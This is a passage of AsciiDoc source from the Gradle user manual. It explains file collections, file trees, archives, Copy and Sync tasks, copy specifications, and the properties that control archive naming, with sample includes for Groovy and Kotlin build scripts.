build.\n\nFor example, imagine `collection` in the above example gains an extra file or two after `union` is created. As long as you use `union` after those files are added to `collection`, `union` will also contain those additional files. The same goes for the `different` file collection.\n\nLive collections are also important when it comes to _filtering_. If you want to use a subset of a file collection, you can take advantage of the link:{javadocPath}\/org\/gradle\/api\/file\/FileCollection.html#filter-org.gradle.api.specs.Spec-[FileCollection.filter(org.gradle.api.specs.Spec)] method to determine which files to \"keep\". In the following example, we create a new collection that consists of only the files that end with .txt in the source collection:\n\n.Filtering a file collection\n====\ninclude::sample[dir=\"snippets\/files\/fileCollections\/groovy\",files=\"build.gradle[tags=filtering-file-collections]\"]\ninclude::sample[dir=\"snippets\/files\/fileCollections\/kotlin\",files=\"build.gradle.kts[tags=filtering-file-collections]\"]\n====\n\n.Output of **`gradle -q filterTextFiles`**\n----\n> gradle -q filterTextFiles\ninclude::{snippetsPath}\/files\/fileCollections\/tests\/fileCollectionsFiltering.out[]\n----\n\nIf `collection` changes at any time, either by adding or removing files from itself, then `textFiles` will immediately reflect the change because it is also a live collection. Note that the closure you pass to `filter()` takes a `File` as an argument and should return a boolean.\n\n[[sec:file_trees]]\n=== File trees\n\nA _file tree_ is a file collection that retains the directory structure of the files it contains and has the type link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree]. This means that all the paths in a file tree must have a shared parent directory. The following diagram highlights the distinction between file trees and file collections in the common case of copying files:\n\n.The differences in how file trees and file collections behave when copying files\nimage::file-collection-vs-file-tree.png[]\n\nNOTE: Although `FileTree` extends `FileCollection` (an is-a relationship), their behaviors do differ. In other words, you can use a file tree wherever a file collection is required, but remember: a file collection is a flat list\/set of files, while a file tree is a file and directory hierarchy. To convert a file tree to a flat collection, use the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#getFiles--[FileTree.getFiles()] property.\n\nThe simplest way to create a file tree is to pass a file or directory path to the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:fileTree(java.lang.Object)[Project.fileTree(java.lang.Object)] method. This will create a tree of all the files and directories in that base directory (but not the base directory itself). The following example demonstrates how to use the basic method and, in addition, how to filter the files and directories using Ant-style patterns:\n\n.Creating a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=define]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=define]\"]\n====\n\nYou can see more examples of supported patterns in the API docs for link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. Also, see the API documentation for `fileTree()` to see what types you can pass as the base directory.\n\nBy default, `fileTree()` returns a `FileTree` instance that applies some default exclude patterns for convenience \u2014 the same defaults as Ant in fact. For the complete default exclude list, see http:\/\/ant.apache.org\/manual\/dirtasks.html#defaultexcludes[the Ant manual].\n\n[[sec:change_default_excludes]]\nIf those default excludes prove problematic, you can workaround the issue by changing the default excludes in the settings script:\n\n.Changing default excludes in the settings script\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"settings.gradle[tags=change-default-exclusions]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"settings.gradle.kts[tags=change-default-exclusions]\"]\n====\n\n[NOTE]\n====\nCurrently, Gradle's default excludes are configured via Ant's `DirectoryScanner` class.\n====\n\n[NOTE]\n====\nGradle does not support changing default excludes during the execution phase.\n====\n\nYou can do many of the same things with file trees that you can with file collections:\n\n * iterate over them (depth first)\n * filter them (using link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#matching-org.gradle.api.Action-[FileTree.matching(org.gradle.api.Action)] and Ant-style patterns)\n * merge them\n\nYou can also traverse file trees using the link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html#visit-org.gradle.api.Action-[FileTree.visit(org.gradle.api.Action)] method. All of these techniques are demonstrated in the following example:\n\n.Using a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=use]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=use]\"]\n====\n\nWe've discussed how to create your own file trees and file collections, but it's also worth bearing in mind that many Gradle plugins provide their own instances of file trees, such as <<building_java_projects.adoc#sec:java_source_sets,Java's source sets>>. These can be used and manipulated in exactly the same way as the file trees you create yourself.\n\nAnother specific type of file tree that users commonly need is the archive, i.e. ZIP files, TAR files, etc. We look at those next.\n\n[[sec:archive_contents]]\n=== Using archives as file trees\n\nAn archive is a directory and file hierarchy packed into a single file. In other words, it's a special case of a file tree, and that's exactly how Gradle treats archives. Instead of using the `fileTree()` method, which only works on normal file systems, you use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)] methods to wrap archive files of the corresponding type (note that JAR, WAR and EAR files are ZIPs). Both methods return `FileTree` instances that you can then use in the same way as normal file trees. For example, you can extract some or all of the files of an archive by copying its contents to some directory on the file system. Or you can merge one archive into another.\n\nHere are some simple examples of creating archive-based file trees:\n\n.Using an archive as a file tree\n====\ninclude::sample[dir=\"snippets\/files\/fileTrees\/groovy\",files=\"build.gradle[tags=archive-trees]\"]\ninclude::sample[dir=\"snippets\/files\/fileTrees\/kotlin\",files=\"build.gradle.kts[tags=archive-trees]\"]\n====\n\nYou can see a practical example of extracting an archive file <<#sec:unpacking_archives_example,in among the common scenarios>> we cover.\n\n[[sec:specifying_multiple_files]]\n=== Understanding implicit conversion to file collections\n\nMany objects in Gradle have properties which accept a set of input files.\nFor example, the link:{groovyDslPath}\/org.gradle.api.tasks.compile.JavaCompile.html[JavaCompile] task has a `source` property that defines the source files to compile.\nYou can set the value of this property using any of the types supported by the <<#sec:file_collections,files()>> method, as mentioned in the api docs.\nThis means you can, for example, set the property to a `File`, `String`, collection, `FileCollection` or even a closure or `Provider`.\n\n*This is a feature of specific tasks*!\nThat means implicit conversion will not happen for just any task that has a `FileCollection` or `FileTree` property.\nIf you want to know whether implicit conversion happens in a particular situation, you will need to read the relevant documentation, such as the corresponding task's API docs.\nAlternatively, you can remove all doubt by explicitly using link:{javadocPath}\/org\/gradle\/api\/file\/ProjectLayout.html#files-java.lang.Object++...++-[ProjectLayout.files(java.lang.Object++...++)] in your build.\n\nHere are some examples of the different types of arguments that the `source` property can take:\n\n.Specifying a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=set-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=set-input-files]\"]\n====\n\nOne other thing to note is that properties like `source` have corresponding methods in core Gradle tasks. Those methods follow the convention of _appending_ to collections of values rather than replacing them. Again, this method accepts any of the types supported by the <<#sec:file_collections,files()>> method, as shown here:\n\n.Appending a set of files\n====\ninclude::sample[dir=\"snippets\/files\/inputFiles\/groovy\",files=\"build.gradle[tags=add-input-files]\"]\ninclude::sample[dir=\"snippets\/files\/inputFiles\/kotlin\",files=\"build.gradle.kts[tags=add-input-files]\"]\n====\n\nAs this is a common convention, we recommend that you follow it in your own custom tasks. Specifically, if you plan to add a method to configure a collection-based property, make sure the method appends rather than replaces values.\n\n[[sec:copying_files]]\n== File copying in depth\n\nThe basic process of copying files in Gradle is a simple one:\n\n * Define a task of type link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy]\n * Specify which files (and potentially directories) to copy\n * Specify a destination for the copied files\n\nBut this apparent simplicity hides a rich API that allows fine-grained control of which files are copied, where they go, and what happens to them as they are copied \u2014 renaming of the files and token substitution of file content are both possibilities, for example.\n\nLet's start with the last two items on the list, which form what is known as a _copy specification_. This is formally based on the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html[CopySpec] interface, which the `Copy` task implements, and offers:\n\n * A link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#from-java.lang.Object++...++-[CopySpec.from(java.lang.Object...)] method to define what to copy\n * An link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#into-java.lang.Object-[CopySpec.into(java.lang.Object)] method to define the destination\n\n`CopySpec` has several additional methods that allow you to control the copying process, but these two are the only required ones. `into()` is straightforward, requiring a directory path as its argument in any form supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method. The `from()` configuration is far more flexible.\n\nNot only does `from()` accept multiple arguments, it also allows several different types of argument. For example, some of the most common types are:\n\n * A `String` \u2014 treated as a file path or, if it starts with \"file:\/\/\", a file URI\n * A `File` \u2014 used as a file path\n * A `FileCollection` or `FileTree` \u2014 all files in the collection are included in the copy\n * A task \u2014\u00a0the files or directories that form a task's <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>> are included\n\nIn fact, `from()` accepts all the same arguments as link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] so see that method for a more detailed list of acceptable types.\n\nSomething else to consider is what type of thing a file path refers to:\n\n * A file \u2014 the file is copied as is\n * A directory \u2014 this is effectively treated as a file tree: everything in it, including subdirectories, is copied. However, the directory itself is not included in the copy.\n * A non-existent file \u2014 the path is ignored\n\nHere is an example that uses multiple `from()` specifications, each with a different argument type. You will probably also notice that `into()` is configured lazily using a closure (in Groovy) or a Provider (in Kotlin) \u2014 a technique that also works with `from()`:\n\n.Specifying copy task source files and destination directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-2]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-2]\"]\n====\n\nNote that the lazy configuration of `into()` is different from a <<#sub:using_child_copy_specifications,child specification>>, even though the syntax is similar. Keep an eye on the number of arguments to distinguish between them.\n\n[[filtering_files]]\n=== Filtering files\n\nYou've already seen that you can filter file collections and file trees directly in a `Copy` task, but you can also apply filtering in any copy specification through the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#include-java.lang.String++...++-[CopySpec.include(java.lang.String...)] and link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#exclude-java.lang.String++...++-[CopySpec.exclude(java.lang.String...)] methods.\n\nBoth of these methods are normally used with Ant-style include or exclude patterns, as described in link:{javadocPath}\/org\/gradle\/api\/tasks\/util\/PatternFilterable.html[PatternFilterable]. You can also perform more complex logic by using a closure that takes a link:{javadocPath}\/org\/gradle\/api\/file\/FileTreeElement.html[FileTreeElement] and returns `true` if the file should be included or `false` otherwise. The following example demonstrates both forms, ensuring that only .html and .jsp files are copied, except for those .html files with the word \"DRAFT\" in their content:\n\n.Selecting the files to copy\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-task-with-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-task-with-patterns]\"]\n====\n\nA question you may ask yourself at this point is what happens when inclusion and exclusion patterns overlap? Which pattern wins? Here are the basic rules:\n\n * If there are no explicit inclusions or exclusions, everything is included\n * If at least one inclusion is specified, only files and directories matching the patterns are included\n * Any exclusion pattern overrides any inclusions, so if a file or directory matches at least one exclusion pattern, it won't be included, regardless of the inclusion patterns\n\nBear these rules in mind when creating combined inclusion and exclusion specifications so that you end up with the exact behavior you want.\n\nNote that the inclusions and exclusions in the above example will apply to _all_ `from()` configurations. If you want to apply filtering to a subset of the copied files, you'll need to use <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:renaming_files]]\n=== Renaming files\n\nThe <<#sec:renaming_files_example,example of how to rename files on copy>> gives you most of the information you need to perform this operation. It demonstrates the two options for renaming:\n\n * Using a regular expression\n * Using a closure\n\nRegular expressions are a flexible approach to renaming, particularly as Gradle supports regex groups that allow you to remove and replaces parts of the source filename. The following example shows how you can remove the string \"-staging-\" from any filename that contains it using a simple regular expression:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-files]\"]\n====\n\nYou can use any regular expression supported by the Java `{javaApi}\/java\/util\/regex\/Pattern.html[Pattern]` class and the substitution string (the second argument of `rename()` works on the same principles as the `{javaApi}\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[Matcher.appendReplacement()]` method.\n\n.Regular expressions in Groovy build scripts\n[NOTE]\n====\nThere are two common issues people come across when using regular expressions in this context:\n\n 1. If you use a slashy string (those delimited by '\/') for the first argument, you _must_ include the parentheses for `rename()` as shown in the above example.\n 2. It's safest to use single quotes for the second argument, otherwise you need to escape the '$' in group substitutions, i.e. `\"\\$1\\$2\"`\n\nThe first is a minor inconvenience, but slashy strings have the advantage that you don't have to escape backslash ('\\') characters in the regular expression. The second issue stems from Groovy's support for embedded expressions using `${ }` syntax in double-quoted and slashy strings.\n====\n\nThe closure syntax for `rename()` is straightforward and can be used for any requirements that simple regular expressions can't handle. You're given the name of a file and you return a new name for that file, or `null` if you don't want to change the name. Do be aware that the closure will be executed for every file that's copied, so try to avoid expensive operations where possible.\n\n[[sec:filtering_files]]\n=== Filtering file content (token substitution, templating, etc.)\n\nNot to be confused with filtering which files are copied, _file content filtering_ allows you to transform the content of files while they are being copied. This can involve basic templating that uses token substitution, removal of lines of text, or even more complex filtering using a full-blown template engine.\n\nThe following example demonstrates several forms of filtering, including token substitution using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#expand-java.util.Map-[CopySpec.expand(java.util.Map)] method and another using link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#filter-java.lang.Class-[CopySpec.filter(java.lang.Class)] with an https:\/\/ant.apache.org\/manual\/Types\/filterchain.html[Ant filter]:\n\n.Filtering files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=filter-files]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=filter-files]\"]\n====\n\nThe `filter()` method has two variants, which behave differently:\n\n * one takes a `{javaApi}\/java\/io\/FilterReader.html[FilterReader]` and is designed to work with Ant filters, such as `ReplaceTokens`\n * one takes a closure or link:{javadocPath}\/org\/gradle\/api\/Transformer.html[Transformer] that defines the transformation for each line of the source file\n\nNote that both variants assume the source files are text based. When you use the `ReplaceTokens` class with `filter()`, the result is a template engine that replaces tokens of the form `@tokenName@` (the Ant-style token) with values that you define.\n\nThe `expand()` method treats the source files as https:\/\/docs.groovy-lang.org\/latest\/html\/api\/groovy\/text\/SimpleTemplateEngine.html[Groovy templates], which evaluate and expand expressions of the form `${expression}`. You can pass in property names and values that are then expanded in the source files. `expand()` allows for more than basic token substitution as the embedded expressions are full-blown Groovy expressions.\n\nNOTE: It's good practice to specify the character set when reading and writing the file, otherwise the transformations won't work properly for non-ASCII text. You configure the character set with the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#getFilteringCharset--[CopySpec.getFilteringCharset()] property. If it's not specified, the JVM default character set is used, which is likely to be different from the one you want.\n\n[[sec:using_the_copyspec_class]]\n=== Using the `CopySpec` class\n\nA copy specification (or copy spec for short) determines what gets copied to where, and what happens to files during the copy. You've alread seen many examples in the form of configuration for `Copy` and archiving tasks. But copy specs have two attributes that are worth covering in more detail:\n\n 1. They can be independent of tasks\n 2. They are hierarchical\n\nThe first of these attributes allows you to _share copy specs within a build_. The second provides fine-grained control within the overall copy specification.\n\n[[sub:sharing_copy_specs]]\n==== Sharing copy specs\n\nConsider a build that has several tasks that copy a project's static website resources or add them to an archive. One task might copy the resources to a folder for a local HTTP server and another might package them into a distribution. You could manually specify the file locations and appropriate inclusions each time they are needed, but human error is more likely to creep in, resulting in inconsistencies between tasks.\n\nOne solution Gradle provides is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method. This allows you to create a copy spec outside of a task, which can then be attached to an appropriate task using the link:{javadocPath}\/org\/gradle\/api\/file\/CopySpec.html#with-org.gradle.api.file.CopySpec++...++-[CopySpec.with(org.gradle.api.file.CopySpec...)] method. The following example demonstrates how this is done:\n\n.Sharing copy specifications\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=standalone-copyspec]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=standalone-copyspec]\"]\n====\n\nBoth the `copyAssets` and `distApp` tasks will process the static resources under `src\/main\/webapp`, as specified by `webAssetsSpec`.\n\n[NOTE]\n====\nThe configuration defined by `webAssetsSpec` will _not_ apply to the app classes included by the `distApp` task. That's because `from appClasses` is its own child specification independent of `with webAssetsSpec`.\n\nThis can be confusing to understand, so it's probably best to treat `with()` as an extra `from()` specification in the task. Hence it doesn't make sense to define a standalone copy spec without at least one `from()` defined.\n====\n\nIf you encounter a scenario in which you want to apply the same copy configuration to _different_ sets of files, then you can share the configuration block directly without using `copySpec()`. Here's an example that has two independent tasks that happen to want to process image files only:\n\n.Sharing copy patterns only\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=shared-copy-patterns]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=shared-copy-patterns]\"]\n====\n\nIn this case, we assign the copy configuration to its own variable and apply it to whatever `from()` specification we want. This doesn't just work for inclusions, but also exclusions, file renaming, and file content filtering.\n\n[[sub:using_child_copy_specifications]]\n==== Using child specifications\n\nIf you only use a single copy spec, the file filtering and renaming will apply to _all_ the files that are copied. Sometimes this is what you want, but not always. Consider the following example that copies files into a directory structure that can be used by a Java Servlet container to deliver a website:\n\n.Creating an exploded WAR for a Servlet container\nimage::exploded-war-child-copy-spec-example.png[]\n\nThis is not a straightforward copy as the `WEB-INF` directory and its subdirectories don't exist within the project, so they must be created during the copy. In addition, we only want HTML and image files going directly into the root folder \u2014 `build\/explodedWar` \u2014 and only JavaScript files going into the `js` directory. So we need separate filter patterns for those two sets of files.\n\nThe solution is to use _child specifications_, which can be applied to both `from()` and `into()` declarations. The following task definition does the necessary work:\n\n.Nested copy specs\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=nested-specs]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=nested-specs]\"]\n====\n\nNotice how the `src\/dist` configuration has a nested inclusion specification: that's the child copy spec. You can of course add content filtering and renaming here as required. A child copy spec is still a copy spec.\n\nThe above example also demonstrates how you can copy files into a subdirectory of the destination either by using a child `into()` on a `from()` or a child `from()` on an `into()`. Both approaches are acceptable, but you may want to create and follow a convention to ensure consistency across your build files.\n\n[NOTE]\nDon't get your `into()` specifications mixed up! For a normal copy \u2014\u00a0one to the filesystem rather than an archive \u2014 there should always be _one_ \"root\" `into()` that simply specifies the overall destination directory of the copy. Any other `into()` should have a child spec attached and its path will be relative to the root `into()`.\n\nOne final thing to be aware of is that a child copy spec inherits its destination path, include patterns, exclude patterns, copy actions, name mappings and filters from its parent. So be careful where you place your configuration.\n\n[[sec:project_copy_method]]\n=== Copying files in your own tasks\n\nThere might be occasions when you want to copy files or directories as _part_ of a task. For example, a custom archiving task based on an unsupported archive format might want to copy files to a temporary directory before they are then archived. You still want to take advantage of Gradle's copy API, but without introducing an extra `Copy` task.\n\nThe solution is to use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copy(org.gradle.api.Action)[Project.copy(org.gradle.api.Action)] method. It works the same way as the `Copy` task by configuring it with a copy spec. Here's a trivial example:\n\n.Copying files using the copy() method without up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method]\"]\n====\n\nThe above example demonstrates the basic syntax and also highlights two major limitations of using the `copy()` method:\n\n 1. The `copy()` method is not <<more_about_tasks.adoc#sec:up_to_date_checks,incremental>>. The example's `copyMethod` task will _always_ execute because it has no information about what files make up the task's inputs. You have to manually define the task inputs and outputs.\n\n 2. Using a task as a copy source, i.e. as an argument to `from()`, won't set up an automatic task dependency between your task and that copy source. As such, if you are using the `copy()` method as part of a task action, you must explicitly declare all inputs and outputs in order to get the correct behavior.\n\nThe following example shows you how to workaround these limitations by using the <<more_about_tasks.adoc#sec:task_input_output_runtime_api,dynamic API for task inputs and outputs>>:\n\n.Copying files using the copy() method with up-to-date check\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-method-with-dependency]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-method-with-dependency]\"]\n====\n\nThese limitations make it preferable to use the `Copy` task wherever possible, because of its builtin support for incremental building and task dependency inference. That is why the `copy()` method is intended for use by <<custom_tasks.adoc#custom_tasks,custom tasks>> that need to copy files as part of their function. Custom tasks that use the `copy()` method should declare the necessary inputs and outputs relevant to the copy action.\n\n[[sec:sync_task]]\n=== Mirroring directories and file collections with the `Sync` task\n\nThe link:{groovyDslPath}\/org.gradle.api.tasks.Sync.html[Sync] task, which extends the `Copy` task, copies the source files into the destination directory and then removes any files from the destination directory which it did not copy. In other words, it synchronizes the contents of a directory with its source. This can be useful for doing things such as installing your application, creating an exploded copy of your archives, or maintaining a copy of the project's dependencies.\n\nHere is an example which maintains a copy of the project's runtime dependencies in the `build\/libs` directory.\n\n.Using the Sync task to copy dependencies\n====\ninclude::sample[dir=\"snippets\/files\/sync\/groovy\",files=\"build.gradle[tags=copy-dependencies]\"]\ninclude::sample[dir=\"snippets\/files\/sync\/kotlin\",files=\"build.gradle.kts[tags=copy-dependencies]\"]\n====\n\nYou can also perform the same function in your own tasks with the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:sync(org.gradle.api.Action)[Project.sync(org.gradle.api.Action)] method.\n\n[[sec:copy_deploy]]\n=== Deploying single files into application servers\n\nWhen working with application servers, you can use a `Copy` task to deploy the application archive (e.g. a WAR file).\nSince you are deploying a single file, the destination directory of the `Copy` is the whole deployment directory.\nThe deployment directory sometimes does contain unreadable files like named pipes, so Gradle may have problems doing up-to-date checks.\nIn order to support this use-case, you can use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to deploy a WAR file\n====\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/deployWarWithCopy\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:install_executable]]\n=== Installing executables\n\nWhen you are building a standalone executable, you may want to install this file on your system, so it ends up in your path.\nYou can use a `Copy` to install the executable into shared directories like `\/usr\/local\/bin`.\nThe installation directory probably contains many other executables, some of which may even be unreadable by Gradle.\nTo support the unreadable files in `Copy`'s destination directory and to avoid doing possible expensive up-to-date checks, you should use link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:ignoreExistingContentInDestinationDir()[Copy.ignoreExistingContentInDestinationDir()].\n\n.Using Copy to install an executable\n====\ninclude::sample[dir=\"snippets\/files\/installExecutable\/groovy\",files=\"build.gradle\"]\ninclude::sample[dir=\"snippets\/files\/installExecutable\/kotlin\",files=\"build.gradle.kts\"]\n====\n\n[[sec:archives]]\n== Archive creation in depth\n\nArchives are essentially self-contained file systems and Gradle treats them as such. This is why working with archives is very similar to working with files and directories, including such things as file permissions.\n\nOut of the box, Gradle supports creation of both ZIP and TAR archives, and by extension Java's JAR, WAR and EAR formats \u2014\u00a0Java's archive formats are all ZIPs. Each of these formats has a corresponding task type to create them: link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.War.html[War], and link:{groovyDslPath}\/org.gradle.plugins.ear.Ear.html[Ear]. These all work the same way and are based on copy specifications, just like the `Copy` task.\n\nCreating an archive file is essentially a file copy in which the destination is implicit, i.e. the archive file itself. Here's a basic example that specifies the path and name of the target archive file:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nIn the next section you'll learn about convention-based archive names, which can save you from always configuring the destination directory and archive name.\n\nThe full power of copy specifications are available to you when creating archives, which means you can do content filtering, file renaming or anything else that is covered in the previous section. A particularly common requirement is copying files into subdirectories of the archive that don't exist in the source folders, something that can be achieved with `into()` <<#sub:using_child_copy_specifications,child specifications>>.\n\nGradle does of course allow you create as many archive tasks as you want, but it's worth bearing in mind that many convention-based plugins provide their own. For example, the Java plugin adds a `jar` task for packaging a project's compiled classes and resources in a JAR. Many of these plugins provide sensible conventions for the names of archives as well as the copy specifications used. We recommend you use these tasks wherever you can, rather than overriding them with your own.\n\n[[sec:archive_naming]]\n=== Archive naming\n\nGradle has several conventions around the naming of archives and where they are created based on the plugins your project uses. The main convention is provided by the <<base_plugin.adoc#base_plugin,Base Plugin>>, which defaults to creating archives in the `$buildDir\/distributions` directory and typically uses archive names of the form _[projectName]-[version].[type]_.\n\nThe following example comes from a project named `archive-naming`, hence the `myZip` task creates an archive named `archive-naming-1.0.zip`:\n\n.Creation of ZIP archive\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task]\"]\n====\n\n.Output of **`gradle -q myZip`**\n----\n> gradle -q myZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/archiveNaming.out[]\n----\n\nNote that the name of the archive does _not_ derive from the name of the task that creates it.\n\nIf you want to change the name and location of a generated archive file, you can provide values for the `archiveFileName` and `destinationDirectory` properties of the corresponding task.\nThese override any conventions that would otherwise apply.\n\nAlternatively, you can make use of the default archive name pattern provided by link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html#org.gradle.api.tasks.bundling.AbstractArchiveTask:archiveFileName[AbstractArchiveTask.getArchiveFileName()]: _[archiveBaseName]-[archiveAppendix]-[archiveVersion]-[archiveClassifier].[archiveExtension]_.\nYou can set each of these properties on the task separately if you wish.\nNote that the Base Plugin uses the convention of project name for _archiveBaseName_, project version for _archiveVersion_ and the archive type for _archiveExtension_.\nIt does not provide values for the other properties.\n\nThis example \u2014 from the same project as the one above \u2014 configures just the `archiveBaseName` property, overriding the default value of the project name:\n\n.Configuration of archive task - custom archive name\n====\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/groovy\",files=\"build.gradle[tags=zip-task-with-custom-base-name]\"]\ninclude::sample[dir=\"snippets\/files\/archiveNaming\/kotlin\",files=\"build.gradle.kts[tags=zip-task-with-custom-base-name]\"]\n====\n\n.Output of **`gradle -q myCustomZip`**\n----\n> gradle -q myCustomZip\ninclude::{snippetsPath}\/files\/archiveNaming\/tests\/zipWithCustomName.out[]\n----\n\nYou can also override the default `archiveBaseName` value for _all_ the archive tasks in your build by using the _project_ property `archivesBaseName`, as demonstrated by the following example:\n\n.Configuration of archive task - appendix & classifier\n====\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/groovy\",files=\"build.gradle[]\"]\ninclude::sample[dir=\"snippets\/files\/archivesChangedBaseName\/kotlin\",files=\"build.gradle.kts[]\"]\n====\n\n.Output of **`gradle -q echoNames`**\n----\n> gradle -q echoNames\ninclude::{snippetsPath}\/files\/archivesChangedBaseName\/tests\/zipWithArchivesBaseName.out[]\n----\n\nYou can find all the possible archive task properties in the API documentation for link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask], but we have also summarized the main ones here:\n\n`archiveFileName` \u2014 `Property<String>`, default: `__archiveBaseName__-__archiveAppendix__-__archiveVersion__-__archiveClassifier__.__archiveExtension__`::\nThe complete file name of the generated archive. If any of the properties in the default value are empty, their '-' separator is dropped.\n\n`archiveFile` \u2014 `Provider<RegularFile>`, _read-only_, default: `__destinationDirectory__\/__archiveFileName__`::\nThe absolute file path of the generated archive.\n\n`destinationDirectory` \u2014 `DirectoryProperty`, default: depends on archive type::\nThe target directory in which to put the generated archive. By default, JARs and WARs go into `$buildDir\/libs`. ZIPs and TARs go into `$buildDir\/distributions`.\n\n`archiveBaseName` \u2014 `Property<String>`, default: `__project.name__`::\nThe base name portion of the archive file name, typically a project name or some other descriptive name for what it contains.\n\n`archiveAppendix` \u2014 `Property<String>`, default: `null`::\nThe appendix portion of the archive file name that comes immediately after the base name. It is typically used to distinguish between different forms of content, such as code and docs, or a minimal distribution versus a full or complete one.\n\n`archiveVersion` \u2014 `Property<String>`, default: `__project.version__`::\nThe version portion of the archive file name, typically in the form of a normal project or product version.\n\n`archiveClassifier` \u2014 `Property<String>`, default: `null`::\nThe classifier portion of the archive file name. Often used to distinguish between archives that target different platforms.\n\n`archiveExtension` \u2014 `Property<String>`, default: depends on archive type and compression type::\nThe filename extension for the 